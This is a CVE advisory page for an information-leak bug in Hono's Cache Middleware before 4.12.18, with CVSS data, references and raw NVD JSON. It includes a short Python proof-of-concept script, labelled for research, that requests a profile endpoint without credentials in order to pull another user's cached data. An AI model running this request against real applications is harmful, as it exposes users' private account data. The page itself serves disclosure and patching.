CVE-2026-44457

Description

Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.12.18, Cache Middleware does not skip caching for responses that declare per-user variance via Vary: Authorization or Vary: Cookie. As a result, a response cached for one authenticated user may be served to subsequent requests from different users. This vulnerability is fixed in 4.12.18.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:hono:hono:*:*:*:*:*:node.js:*:* - VULNERABLE

Hono < 4.12.18

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# PoC for CVE-2026-44457: Hono Cache Middleware Information Leakage
# This script demonstrates how an attacker can retrieve cached data of another user.

target_url = "http://vulnerable-hono-app.com/api/profile"

def exploit():
    # Step 1: Simulate the scenario where a victim's data is cached.
    # In a real attack, this happens naturally when a victim browses the site.
    # Here we assume the cache is already populated by a previous request from a victim.
    print("[+] Assuming victim data is already cached...")

    # Step 2: Attacker sends a request without authentication headers.
    # The application should return 401 Unauthorized.
    # However, due to the vulnerability, it returns the cached 200 OK from the victim.
    headers = {
        # No Authorization or Cookie headers
        "User-Agent": "Attacker-Scanner/1.0"
    }

    print(f"[*] Sending unauthenticated request to {target_url}")
    response = requests.get(target_url, headers=headers)

    # Step 3: Check if we received the victim's data
    if response.status_code == 200:
        print("[+] Exploit successful! Received cached data:")
        print(response.text)
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44457
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44457
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44457/
[4] VulDB https://vuldb.com/cve/CVE-2026-44457
[5] https://github.com/honojs/hono/security/advisories/GHSA-p77w-8qqv-26rm

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44457", "sourceIdentifier": "[email protected]", "published": "2026-05-13T16:16:57.700", "lastModified": "2026-05-13T18:34:01.020", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.12.18, Cache Middleware does not skip caching for responses that declare per-user variance via Vary: Authorization or Vary: Cookie. As a result, a response cached for one authenticated user may be served to subsequent requests from different users. This vulnerability is fixed in 4.12.18."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-524"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hono:hono:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "4.12.18", "matchCriteriaId": "5AB1A6FC-8475-4A23-9E63-46F3E6C5D264"}]}]}], "references": [{"url": "https://github.com/honojs/hono/security/advisories/GHSA-p77w-8qqv-26rm", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}